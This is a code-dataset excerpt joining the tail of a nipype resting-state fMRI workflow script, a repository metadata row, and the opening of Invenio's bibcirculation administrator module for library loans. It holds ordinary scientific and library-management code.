wf.connect(collector, 'out', warpall, 'input_image')
wf.connect(registration, 'outputspec.transforms', warpall, 'transforms')
mask_target = Node(fsl.ImageMaths(op_string='-bin'), name='target_mask')
wf.connect(registration, 'outputspec.anat2target', mask_target, 'in_file')
maskts = MapNode(fsl.ApplyMask(), iterfield=['in_file'], name='ts_masker')
wf.connect(warpall, 'output_image', maskts, 'in_file')
wf.connect(mask_target, 'out_file', maskts, 'mask_file')
# map to surface
# extract aparc+aseg ROIs
# extract subcortical ROIs
# extract target space ROIs
# combine subcortical and cortical rois into a single cifti file
#######
# Convert aparc to subject functional space
# Sample the average time series in aparc ROIs
sampleaparc = MapNode(freesurfer.SegStats(default_color_table=True),
iterfield=['in_file', 'summary_file',
'avgwf_txt_file'],
name='aparc_ts')
sampleaparc.inputs.segment_id = ([8] + list(range(10, 14)) + [17, 18, 26, 47] +
list(range(49, 55)) + [58] + list(range(1001, 1036)) +
list(range(2001, 2036)))
wf.connect(registration, 'outputspec.aparc',
sampleaparc, 'segmentation_file')
wf.connect(collector, 'out', sampleaparc, 'in_file')
def get_names(files, suffix):
"""Generate appropriate names for output files
"""
from nipype.utils.filemanip import (split_filename, filename_to_list,
list_to_filename)
out_names = []
for filename in files:
_, name, _ = split_filename(filename)
out_names.append(name + suffix)
return list_to_filename(out_names)
wf.connect(collector, ('out', get_names, '_avgwf.txt'),
sampleaparc, 'avgwf_txt_file')
wf.connect(collector, ('out', get_names, '_summary.stats'),
sampleaparc, 'summary_file')
# Sample the time series onto the surface of the target surface. Performs
# sampling into left and right hemisphere
target = Node(IdentityInterface(fields=['target_subject']), name='target')
target.iterables = ('target_subject', filename_to_list(target_subject))
samplerlh = MapNode(freesurfer.SampleToSurface(),
iterfield=['source_file'],
name='sampler_lh')
samplerlh.inputs.sampling_method = "average"
samplerlh.inputs.sampling_range = (0.1, 0.9, 0.1)
samplerlh.inputs.sampling_units = "frac"
samplerlh.inputs.interp_method = "trilinear"
samplerlh.inputs.smooth_surf = surf_fwhm
# samplerlh.inputs.cortex_mask = True
samplerlh.inputs.out_type = 'niigz'
samplerlh.inputs.subjects_dir = subjects_dir
samplerrh = samplerlh.clone('sampler_rh')
samplerlh.inputs.hemi = 'lh'
wf.connect(collector, 'out', samplerlh, 'source_file')
wf.connect(registration, 'outputspec.out_reg_file', samplerlh, 'reg_file')
wf.connect(target, 'target_subject', samplerlh, 'target_subject')
samplerrh.set_input('hemi', 'rh')
wf.connect(collector, 'out', samplerrh, 'source_file')
wf.connect(registration, 'outputspec.out_reg_file', samplerrh, 'reg_file')
wf.connect(target, 'target_subject', samplerrh, 'target_subject')
# Combine left and right hemisphere to text file
combiner = MapNode(Function(input_names=['left', 'right'],
output_names=['out_file'],
function=combine_hemi,
imports=imports),
iterfield=['left', 'right'],
name="combiner")
wf.connect(samplerlh, 'out_file', combiner, 'left')
wf.connect(samplerrh, 'out_file', combiner, 'right')
# Sample the time series file for each subcortical roi
ts2txt = MapNode(Function(input_names=['timeseries_file', 'label_file',
'indices'],
output_names=['out_file'],
function=extract_subrois,
imports=imports),
iterfield=['timeseries_file'],
name='getsubcortts')
ts2txt.inputs.indices = [8] + list(range(10, 14)) + [17, 18, 26, 47] +\
list(range(49, 55)) + [58]
ts2txt.inputs.label_file = \
os.path.abspath(('OASIS-TRT-20_jointfusion_DKT31_CMA_labels_in_MNI152_'
'2mm_v2.nii.gz'))
wf.connect(maskts, 'out_file', ts2txt, 'timeseries_file')
######
substitutions = [('_target_subject_', ''),
('_filtermotart_cleaned_bp_trans_masked', ''),
('_filtermotart_cleaned_bp', '')
]
regex_subs = [('_ts_masker.*/sar', '/smooth/'),
('_ts_masker.*/ar', '/unsmooth/'),
('_combiner.*/sar', '/smooth/'),
('_combiner.*/ar', '/unsmooth/'),
('_aparc_ts.*/sar', '/smooth/'),
('_aparc_ts.*/ar', '/unsmooth/'),
('_getsubcortts.*/sar', '/smooth/'),
('_getsubcortts.*/ar', '/unsmooth/'),
('series/sar', 'series/smooth/'),
('series/ar', 'series/unsmooth/'),
('_inverse_transform./', ''),
]
# Save the relevant data into an output directory
datasink = Node(interface=DataSink(), name="datasink")
datasink.inputs.base_directory = sink_directory
datasink.inputs.container = subject_id
datasink.inputs.substitutions = substitutions
datasink.inputs.regexp_substitutions = regex_subs # (r'(/_.*(\d+/))', r'/run\2')
wf.connect(realign, 'realignment_parameters', datasink, 'resting.qa.motion')
wf.connect(art, 'norm_files', datasink, 'resting.qa.art.@norm')
wf.connect(art, 'intensity_files', datasink, 'resting.qa.art.@intensity')
wf.connect(art, 'outlier_files', datasink, 'resting.qa.art.@outlier_files')
wf.connect(registration, 'outputspec.segmentation_files', datasink, 'resting.mask_files')
wf.connect(registration, 'outputspec.anat2target', datasink, 'resting.qa.ants')
wf.connect(mask, 'mask_file', datasink, 'resting.mask_files.@brainmask')
wf.connect(mask_target, 'out_file', datasink, 'resting.mask_files.target')
wf.connect(filter1, 'out_f', datasink, 'resting.qa.compmaps.@mc_F')
wf.connect(filter1, 'out_pf', datasink, 'resting.qa.compmaps.@mc_pF')
wf.connect(filter2, 'out_f', datasink, 'resting.qa.compmaps')
wf.connect(filter2, 'out_pf', datasink, 'resting.qa.compmaps.@p')
wf.connect(bandpass, 'out_files', datasink, 'resting.timeseries.@bandpassed')
wf.connect(smooth, 'smoothed_files', datasink, 'resting.timeseries.@smoothed')
wf.connect(createfilter1, 'out_files',
datasink, 'resting.regress.@regressors')
wf.connect(createfilter2, 'out_files',
datasink, 'resting.regress.@compcorr')
wf.connect(maskts, 'out_file', datasink, 'resting.timeseries.target')
wf.connect(sampleaparc, 'summary_file',
datasink, 'resting.parcellations.aparc')
wf.connect(sampleaparc, 'avgwf_txt_file',
datasink, 'resting.parcellations.aparc.@avgwf')
wf.connect(ts2txt, 'out_file',
datasink, 'resting.parcellations.grayo.@subcortical')
datasink2 = Node(interface=DataSink(), name="datasink2")
datasink2.inputs.base_directory = sink_directory
datasink2.inputs.container = subject_id
datasink2.inputs.substitutions = substitutions
datasink2.inputs.regexp_substitutions = regex_subs # (r'(/_.*(\d+/))', r'/run\2')
wf.connect(combiner, 'out_file',
datasink2, 'resting.parcellations.grayo.@surface')
return wf
"""
Creates the full workflow including getting information from dicom files
"""
def create_resting_workflow(args, name=None):
TR = args.TR
slice_times = args.slice_times
if args.dicom_file:
TR, slice_times, slice_thickness = get_info(args.dicom_file)
slice_times = (np.array(slice_times) / 1000.).tolist()
if name is None:
name = 'resting_' + args.subject_id
kwargs = dict(files=[os.path.abspath(filename) for filename in args.files],
target_file=os.path.abspath(args.target_file),
subject_id=args.subject_id,
TR=TR,
slice_times=slice_times,
vol_fwhm=args.vol_fwhm,
surf_fwhm=args.surf_fwhm,
norm_threshold=2.,
subjects_dir=os.path.abspath(args.fsdir),
target_subject=args.target_surfs,
lowpass_freq=args.lowpass_freq,
highpass_freq=args.highpass_freq,
sink_directory=os.path.abspath(args.sink),
name=name)
wf = create_workflow(**kwargs)
return wf
if __name__ == "__main__":
from argparse import ArgumentParser, RawTextHelpFormatter
defstr = ' (default %(default)s)'
parser = ArgumentParser(description=__doc__,
formatter_class=RawTextHelpFormatter)
parser.add_argument("-d", "--dicom_file", dest="dicom_file",
help="an example dicom file from the resting series")
parser.add_argument("-f", "--files", dest="files", nargs="+",
help="4d nifti files for resting state",
required=True)
parser.add_argument("-t", "--target", dest="target_file",
help=("Target in MNI space. Best to use the MindBoggle "
"template - "
"OASIS-30_Atropos_template_in_MNI152_2mm.nii.gz"),
required=True)
parser.add_argument("-s", "--subject_id", dest="subject_id",
help="FreeSurfer subject id", required=True)
parser.add_argument("--subjects_dir", dest="fsdir",
help="FreeSurfer subject directory", required=True)
parser.add_argument("--target_surfaces", dest="target_surfs", nargs="+",
default=['fsaverage5'],
help="FreeSurfer target surfaces" + defstr)
parser.add_argument("--TR", dest="TR", default=None, type=float,
help="TR if dicom not provided in seconds")
parser.add_argument("--slice_times", dest="slice_times", nargs="+",
type=float, help="Slice onset times in seconds")
parser.add_argument('--vol_fwhm', default=6., dest='vol_fwhm',
type=float, help="Spatial FWHM" + defstr)
parser.add_argument('--surf_fwhm', default=15., dest='surf_fwhm',
type=float, help="Spatial FWHM" + defstr)
parser.add_argument("-l", "--lowpass_freq", dest="lowpass_freq",
default=0.1, type=float,
help="Low pass frequency (Hz)" + defstr)
parser.add_argument("-u", "--highpass_freq", dest="highpass_freq",
default=0.01, type=float,
help="High pass frequency (Hz)" + defstr)
parser.add_argument("-o", "--output_dir", dest="sink",
help="Output directory base", required=True)
parser.add_argument("-w", "--work_dir", dest="work_dir",
help="Output directory base")
parser.add_argument("-p", "--plugin", dest="plugin",
default='Linear',
help="Plugin to use")
parser.add_argument("--plugin_args", dest="plugin_args",
help="Plugin arguments")
args = parser.parse_args()
wf = create_resting_workflow(args)
if args.work_dir:
work_dir = os.path.abspath(args.work_dir)
else:
work_dir = os.getcwd()
wf.base_dir = work_dir
if args.plugin_args:
wf.run(args.plugin, plugin_args=eval(args.plugin_args))
else:
wf.run(args.plugin)
|
bsd-3-clause
| -405,855,577,794,183,200
| 40.41561
| 139
| 0.594639
| false
| 3.692997
| false
| false
| false
|
lnielsen/invenio
|
invenio/legacy/bibcirculation/adminlib.py
|
1
|
240137
|
## Administrator interface for Bibcirculation
##
## This file is part of Invenio.
## Copyright (C) 2008, 2009, 2010, 2011, 2012, 2013, 2014 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
## """Invenio Bibcirculation Administrator Interface."""
from __future__ import division
"""
Invenio Bibcirculation Administrator.
The functions are positioned by grouping into logical
categories('User Pages', 'Loans, Returns and Loan requests',
'ILLs', 'Libraries', 'Vendors' ...)
These orders should be maintained and when necessary, improved
for readability, as and when additional methods are added.
When applicable, methods should be renamed, refactored and
appropriate documentation added.
"""
__revision__ = "$Id$"
__lastupdated__ = """$Date$"""
import datetime, time, types
# Other Invenio imports
from invenio.config import \
CFG_SITE_LANG, \
CFG_SITE_URL, \
CFG_SITE_SECURE_URL, \
CFG_CERN_SITE
import invenio.modules.access.engine as acce
from invenio.legacy.webpage import page
from invenio.legacy.webuser import getUid, page_not_authorized
from invenio.legacy.webstat.api import register_customevent
from invenio.ext.logging import register_exception
from invenio.ext.email import send_email
from invenio.legacy.search_engine import perform_request_search, record_exists
from invenio.utils.url import create_html_link, create_url, redirect_to_url
from invenio.base.i18n import gettext_set_language
from invenio.config import \
CFG_BIBCIRCULATION_ITEM_STATUS_ON_LOAN, \
CFG_BIBCIRCULATION_ITEM_STATUS_ON_ORDER, \
CFG_BIBCIRCULATION_ITEM_STATUS_ON_SHELF, \
CFG_BIBCIRCULATION_ITEM_STATUS_IN_PROCESS, \
CFG_BIBCIRCULATION_ITEM_STATUS_UNDER_REVIEW, \
CFG_BIBCIRCULATION_LOAN_STATUS_ON_LOAN, \
CFG_BIBCIRCULATION_LOAN_STATUS_RETURNED, \
CFG_BIBCIRCULATION_REQUEST_STATUS_WAITING, \
CFG_BIBCIRCULATION_REQUEST_STATUS_PENDING, \
CFG_BIBCIRCULATION_REQUEST_STATUS_DONE, \
CFG_BIBCIRCULATION_REQUEST_STATUS_CANCELLED, \
CFG_BIBCIRCULATION_ILL_STATUS_NEW, \
CFG_BIBCIRCULATION_ILL_STATUS_ON_LOAN, \
CFG_BIBCIRCULATION_LIBRARY_TYPE_MAIN, \
CFG_BIBCIRCULATION_ACQ_STATUS_NEW, \
CFG_BIBCIRCULATION_ACQ_STATUS_RECEIVED, \
CFG_BIBCIRCULATION_PROPOSAL_STATUS_ON_ORDER, \
CFG_BIBCIRCULATION_PROPOSAL_STATUS_PUT_ASIDE, \
CFG_BIBCIRCULATION_PROPOSAL_STATUS_RECEIVED
# Bibcirculation imports
from invenio.legacy.bibcirculation.config import \
CFG_BIBCIRCULATION_TEMPLATES, CFG_BIBCIRCULATION_LIBRARIAN_EMAIL, \
CFG_BIBCIRCULATION_LOANS_EMAIL, CFG_BIBCIRCULATION_ILLS_EMAIL, \
CFG_BIBCIRCULATION_PROPOSAL_TYPE, CFG_BIBCIRCULATION_ACQ_STATUS
from invenio.legacy.bibcirculation.utils import book_title_from_MARC, \
update_status_if_expired, \
renew_loan_for_X_days, \
print_pending_hold_requests_information, \
print_new_loan_information, \
validate_date_format, \
generate_email_body, \
book_information_from_MARC, \
search_user, \
tag_all_requests_as_done, \
update_user_info_from_ldap, \
update_request_data, \
update_requests_statuses, \
has_date_format, \
generate_tmp_barcode, \
looks_like_dictionary
import invenio.legacy.bibcirculation.db_layer as db
import invenio.legacy.template
bc_templates = invenio.legacy.template.load('bibcirculation')
def is_adminuser(req):
"""check if user is a registered administrator. """
return acce.acc_authorize_action(req, "runbibcirculation")
def mustloginpage(req, message):
"""show a page asking the user to login."""
navtrail_previous_links = '<a class="navtrail" href="%s/admin/">' \
'Admin Area</a> > ' \
'<a class="navtrail" href="%s/admin/bibcirculation/">' \
'BibCirculation Admin</a> ' % (CFG_SITE_SECURE_URL, CFG_SITE_SECURE_URL)
return page_not_authorized(req=req, text=message,
navtrail=navtrail_previous_links)
def load_template(template):
"""
Load a letter/notification template from
bibcirculation_config.py.
@type template: string.
@param template: template that will be used.
@return: template(string)
"""
if template == "overdue_letter":
output = CFG_BIBCIRCULATION_TEMPLATES['OVERDUE']
elif template == "reminder":
output = CFG_BIBCIRCULATION_TEMPLATES['REMINDER']
elif template == "notification":
output = CFG_BIBCIRCULATION_TEMPLATES['NOTIFICATION']
elif template == "ill_received":
output = CFG_BIBCIRCULATION_TEMPLATES['ILL_RECEIVED']
elif template == "ill_recall1":
output = CFG_BIBCIRCULATION_TEMPLATES['ILL_RECALL1']
elif template == "ill_recall2":
output = CFG_BIBCIRCULATION_TEMPLATES['ILL_RECALL2']
elif template == "ill_recall3":
output = CFG_BIBCIRCULATION_TEMPLATES['ILL_RECALL3']
elif template == "claim_return":
output = CFG_BIBCIRCULATION_TEMPLATES['SEND_RECALL']
elif template == "proposal_notification":
output = CFG_BIBCIRCULATION_TEMPLATES['PROPOSAL_NOTIFICATION']
elif template == "proposal_acceptance":
output = CFG_BIBCIRCULATION_TEMPLATES['PROPOSAL_ACCEPTANCE_NOTIFICATION']
elif template == "proposal_refusal":
output = CFG_BIBCIRCULATION_TEMPLATES['PROPOSAL_REFUSAL_NOTIFICATION']
elif template == "purchase_notification":
output = CFG_BIBCIRCULATION_TEMPLATES['PURCHASE_NOTIFICATION']
elif template == "purchase_received_tid":
output = CFG_BIBCIRCULATION_TEMPLATES['PURCHASE_RECEIVED_TID']
elif template == "purchase_received_cash":
output = CFG_BIBCIRCULATION_TEMPLATES['PURCHASE_RECEIVED_CASH']
else:
output = CFG_BIBCIRCULATION_TEMPLATES['EMPTY']
return output
def index(req, ln=CFG_SITE_LANG):
"""
main function to show pages for bibcirculationadmin
"""
navtrail_previous_links = '<a class="navtrail"' \
' href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
body = bc_templates.tmpl_index(ln=ln)
return page(title=_("BibCirculation Admin"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
###
### Loans, Loan Requests, Loan Returns related templates.
###
def loan_on_desk_step1(req, key, string, ln=CFG_SITE_LANG):
"""
Step 1/4 of loan procedure.
Search a user/borrower and return a list with all the possible results.
@type key: string.
@param key: attribute that will be considered during the search. Can be 'name',
'email' or 'ccid/id'.
@type string: string.
@param string: keyword used during the search.
@return: list of potential borrowers.
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
infos = []
_ = gettext_set_language(ln)
if key and not string:
infos.append(_('Empty string. Please, try again.'))
body = bc_templates.tmpl_loan_on_desk_step1(result=None, key=key,
string=string, infos=infos,
ln=ln)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
return page(title=_("Loan on desk"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
result = search_user(key, string)
borrowers_list = []
if len(result) == 0 and key:
if CFG_CERN_SITE:
infos.append(_("0 borrowers found.") + ' ' +_("Search by CCID."))
else:
new_borrower_link = create_html_link(CFG_SITE_SECURE_URL +
'/admin2/bibcirculation/add_new_borrower_step1',
{'ln': ln}, _("Register new borrower."))
message = _("0 borrowers found.") + ' ' + new_borrower_link
infos.append(message)
elif len(result) == 1:
return loan_on_desk_step2(req, result[0][0], ln)
else:
for user in result:
borrower_data = db.get_borrower_data_by_id(user[0])
borrowers_list.append(borrower_data)
body = bc_templates.tmpl_loan_on_desk_step1(result=borrowers_list,
key=key,
string=string,
infos=infos,
ln=ln)
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
return page(title=_("Circulation management"),
uid=id_user,
req=req,
body=body,
language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def loan_on_desk_step2(req, user_id, ln=CFG_SITE_LANG):
"""
Step 2/4 of loan procedure.
Display the user/borrower's information.
@type user_id: integer
@param user_id: identify the borrower. It is also the primary key of
the table crcBORROWER.
"""
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
_ = gettext_set_language(ln)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
infos = []
body = bc_templates.tmpl_loan_on_desk_step2(user_id=user_id,
infos=infos,
ln=ln)
return page(title=_("Circulation management"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def loan_on_desk_step3(req, user_id, list_of_barcodes, ln=CFG_SITE_LANG):
"""
Step 3/4 of loan procedure.
Checks that the barcodes exist and that there are no request on these records.
Lets the librarian change the due dates and add notes.
@type user_id: integer
@param user_id: identify the borrower. It is also the primary key of
the table crcBORROWER.
@type list_of_barcodes: list
@param list_of_barcodes: list of strings with the barcodes
introduced by the librarian with the barcode reader
"""
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
_ = gettext_set_language(ln)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
infos = []
list_of_books = []
# to avoid duplicates
aux = []
for bc in list_of_barcodes:
if bc not in aux:
aux.append(bc)
list_of_barcodes = aux
for value in list_of_barcodes:
recid = db.get_id_bibrec(value)
loan_id = db.is_item_on_loan(value)
item_description = db.get_item_description(value)
if recid is None:
infos.append(_('%(x_strong_tag_open)s%(x_barcode)s%(x_strong_tag_close)s Unknown barcode.') % {'x_barcode': value, 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>'} + ' ' + _('Please, try again.'))
body = bc_templates.tmpl_loan_on_desk_step2(user_id=user_id,
infos=infos,
ln=ln)
elif loan_id:
infos.append('The item with the barcode %(x_strong_tag_open)s%(x_barcode)s%(x_strong_tag_close)s is on a loan. Cannot be checked out.' % {'x_barcode': value, 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>'})
body = bc_templates.tmpl_loan_on_desk_step2(user_id=user_id,
infos=infos,
ln=ln)
elif user_id is None:
infos.append(_('You must select one borrower.'))
body = bc_templates.tmpl_loan_on_desk_step1(result=None,
key='',
string='',
infos=infos,
ln=ln)
else:
queue = db.get_queue_request(recid, item_description)
(library_id, location) = db.get_lib_location(value)
tup = (recid, value, library_id, location)
list_of_books.append(tup)
book_details = db.get_item_info(value)
item_status = book_details[7]
if item_status != CFG_BIBCIRCULATION_ITEM_STATUS_ON_SHELF:
message = _("%(x_strong_tag_open)sWARNING:%(x_strong_tag_close)s Note that item %(x_strong_tag_open)s%(x_barcode)s%(x_strong_tag_close)s status is %(x_strong_tag_open)s%(x_status)s%(x_strong_tag_close)s") % {'x_barcode': value, 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>', 'x_status': item_status}
infos.append(message)
if CFG_CERN_SITE:
library_type = db.get_library_type(library_id)
if library_type != CFG_BIBCIRCULATION_LIBRARY_TYPE_MAIN:
library_name = db.get_library_name(library_id)
message = _("%(x_strong_tag_open)sWARNING:%(x_strong_tag_close)s Note that item %(x_strong_tag_open)s%(x_barcode)s%(x_strong_tag_close)s location is %(x_strong_tag_open)s%(x_location)s%(x_strong_tag_close)s") % {'x_barcode': value, 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>', 'x_location': library_name}
infos.append(message)
if len(queue) != 0 and queue[0][0] != user_id:
message = _("Another user is waiting for the book: %(x_strong_tag_open)s%(x_title)s%(x_strong_tag_close)s. \n\n If you want continue with this loan choose %(x_strong_tag_open)s[Continue]%(x_strong_tag_close)s.") % {'x_title': book_title_from_MARC(recid), 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>'}
infos.append(message)
body = bc_templates.tmpl_loan_on_desk_step3(user_id=user_id,
list_of_books=list_of_books,
infos=infos, ln=ln)
if list_of_barcodes == []:
infos.append(_('Empty barcode.') + ' ' + _('Please, try again.'))
body = bc_templates.tmpl_loan_on_desk_step2(user_id=user_id,
infos=infos,
ln=ln)
if infos == []:
# shortcut to simplify loan process
due_dates = []
for bc in list_of_barcodes:
due_dates.append(renew_loan_for_X_days(bc))
return loan_on_desk_step4(req, list_of_barcodes, user_id,
due_dates, None, ln)
else:
return page(title=_("Circulation management"),
uid=id_user,
req=req,
body=body,
metaheaderadd = "<link rel=\"stylesheet\" href=\"%s/vendors/jquery-ui/themes/redmond/jquery-ui.min.css\" type=\"text/css\" />" % CFG_SITE_SECURE_URL,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def loan_on_desk_step4(req, list_of_barcodes, user_id,
due_date, note, ln=CFG_SITE_LANG):
"""
Step 4/4 of loan procedure.
Checks that items are not on loan and that the format of
the dates is correct and creates the loans
@type user_id: integer
@param user_id: identify the borrower. It is also the primary key of
the table crcBORROWER.
@type list_of_barcodes: list
@param list_of_barcodes: list of strings with the barcodes
introduced by the librarian with the barcode reader
@type due_date: list.
@param due_date: list of due dates.
@type note: string.
@param note: note about the new loan.
@return: page with the list 'Last Loans'
"""
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
_ = gettext_set_language(ln)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
infos = []
#loaned_on = datetime.date.today()
#Check if one of the given items is on loan.
on_loan = []
for barcode in list_of_barcodes:
is_on_loan = db.is_item_on_loan(barcode)
if is_on_loan:
on_loan.append(barcode)
if len(on_loan) != 0:
message = _("The items with barcode %(x_strong_tag_open)s%(x_barcode)s%(x_strong_tag_close)s are already on loan.") % {'x_barcode': on_loan, 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>'}
infos.append(message)
body = bc_templates.tmpl_loan_on_desk_step1(result=None, key='',
string='', infos=infos,
ln=ln)
return page(title=_("Loan on desk"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
# validate the period of interest given by the admin
for date in due_date:
if validate_date_format(date) is False:
infos = []
message = _("The given due date %(x_strong_tag_open)s%(x_date)s%(x_strong_tag_close)s is not a valid date or date format") % {'x_date': date, 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>'}
infos.append(message)
list_of_books = []
for bc in list_of_barcodes:
recid = db.get_id_bibrec(bc)
(library_id, location) = db.get_lib_location(bc)
tup = (recid, bc, library_id, location)
list_of_books.append(tup)
body = bc_templates.tmpl_loan_on_desk_step3(user_id=user_id,
list_of_books=list_of_books,
infos=infos, ln=ln)
return page(title=_("Circulation management"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
#if borrower_id == None:
# db.new_borrower(ccid, name, email, phone, address, mailbox, '')
# borrower_id = db.get_borrower_id_by_email(email)
for i in range(len(list_of_barcodes)):
note_format = {}
if note:
note_format[time.strftime("%Y-%m-%d %H:%M:%S")] = str(note)
barcode = list_of_barcodes[i]
recid = db.get_id_bibrec(barcode)
db.new_loan(user_id, recid, barcode, due_date[i],
CFG_BIBCIRCULATION_LOAN_STATUS_ON_LOAN,
'normal', note_format)
# Duplicate requests on items belonging to a single record has been disabled.
db.tag_requests_as_done(user_id, barcode)
# tag_all_requests_as_done(barcode, user_id)
db.update_item_status(CFG_BIBCIRCULATION_ITEM_STATUS_ON_LOAN, barcode)
update_requests_statuses(barcode)
infos.append(_("A loan for the item %(x_strong_tag_open)s%(x_title)s%(x_strong_tag_close)s, with barcode %(x_strong_tag_open)s%(x_barcode)s%(x_strong_tag_close)s, has been registered with success.") % {'x_title': book_title_from_MARC(recid), 'x_barcode': barcode, 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>'})
infos.append(_("You could enter the barcode for this user's next loan, if any."))
body = bc_templates.tmpl_loan_on_desk_step2(user_id=user_id,
infos=infos, ln=ln)
return page(title=_("Circulation management"),
uid=id_user,
req=req,
body=body,
metaheaderadd = "<link rel=\"stylesheet\" href=\"%s/vendors/jquery-ui/themes/redmond/jquery-ui.min.css\" type=\"text/css\" />" % CFG_SITE_SECURE_URL,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def loan_on_desk_confirm(req, barcode=None, borrower_id=None, ln=CFG_SITE_LANG):
"""
*** Obsolete and unmantained function ***
Confirm the return of an item.
@type barcode: string.
@param barcode: identify the item. It is the primary key of the table
crcITEM.
@type borrower_id: integer.
@param borrower_id: identify the borrower. It is also the primary key of
the table crcBORROWER.
"""
navtrail_previous_links = '<a class="navtrail" ' \
'href="%s/help/admin">Admin Area' \
'</a>' % (CFG_SITE_SECURE_URL,)
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
result = db.loan_on_desk_confirm(barcode, borrower_id)
body = bc_templates.tmpl_loan_on_desk_confirm(result=result,
barcode=barcode,
borrower_id=borrower_id,
ln=ln)
return page(title=_("Loan on desk confirm"),
uid=id_user,
req=req,
body=body, language=ln,
navtrail=navtrail_previous_links,
lastupdated=__lastupdated__)
def register_new_loan(req, barcode, borrower_id,
request_id, new_note, print_data, ln=CFG_SITE_LANG):
"""
Register a new loan. This function is from the "Create Loan" pages.
@type barcode: string.
@param barcode: identify the item. It is the primary key of the table
crcITEM.
@type borrower_id: integer.
@param borrower_id: identify the borrower. It is also the primary key of
the table crcBORROWER.
@type request_id: integer.
@param request_id: identify the hold request. It is also the primary key
of the table crcLOANREQUEST.
@type new_note: string.
@param new_note: associate a note to this loan.
@type print_data: string.
@param print_data: print the information about this loan.
@return: new loan
"""
id_user = getUid(req)
(auth_code, auth_message) = is_adminuser(req)
if auth_code != 0:
return mustloginpage(req, auth_message)
_ = gettext_set_language(ln)
has_recid = db.get_id_bibrec(barcode)
loan_id = db.is_item_on_loan(barcode)
recid = db.get_request_recid(request_id)
req_barcode = db.get_requested_barcode(request_id)
req_description = db.get_item_description(req_barcode)
# Get all the items belonging to the record whose
# description is the same.
list_of_barcodes = db.get_barcodes(recid, req_description)
infos = []
if print_data == 'true':
return print_new_loan_information(req, ln)
else:
if has_recid is None:
message = _('%(x_strong_tag_open)s%(x_barcode)s%(x_strong_tag_close)s Unknown barcode.') % {'x_barcode': barcode, 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>'} + ' ' + _('Please, try again.')
infos.append(message)
borrower = db.get_borrower_details(borrower_id)
title = _("Create Loan")
body = bc_templates.tmpl_create_loan(request_id=request_id,
recid=recid,
borrower=borrower,
infos=infos,
ln=ln)
elif loan_id:
infos.append(_('The item with the barcode %(x_strong_tag_open)s%(x_barcode)s%(x_strong_tag_close)s is on loan.') % {'x_barcode': barcode, 'x_strong_tag_open': '<strong>', 'x_strong_tag_close': '</strong>'})
borrower = db.get_borrower_details(borrower_id)
title = _("Create Loan")
body = bc_templates.tmpl_create_loan(request_id=request_id,
recid=recid,
borrower=borrower,
infos=infos,
ln=ln)
elif barcode not in list_of_barcodes:
infos.append(_('The given barcode "%(x_barcode)s" does not correspond to requested item.') % {'x_barcode': barcode})
borrower = db.get_borrower_details(borrower_id)
title = _("Create Loan")
body = bc_templates.tmpl_create_loan(request_id=request_id,
recid=recid,
borrower=borrower,
infos=infos,
ln=ln)
else:
recid = db.get_id_bibrec(barcode)
#loaned_on = datetime.date.today()
due_date = renew_loan_for_X_days(barcode)
if new_note:
note_format = '[' + time.ctime() + '] ' + new_note + '\n'
else:
note_format = ''
last_id = db.new_loan(borrower_id, recid, barcode,
due_date, CFG_BIBCIRCULATION_LOAN_STATUS_ON_LOAN,
'normal', note_format)
# register event in webstat
try:
register_customevent("loanrequest", [request_id, last_id])
except:
register_exception(suffix="Do the webstat tables exists? Try with 'webstatadmin --load-config'")
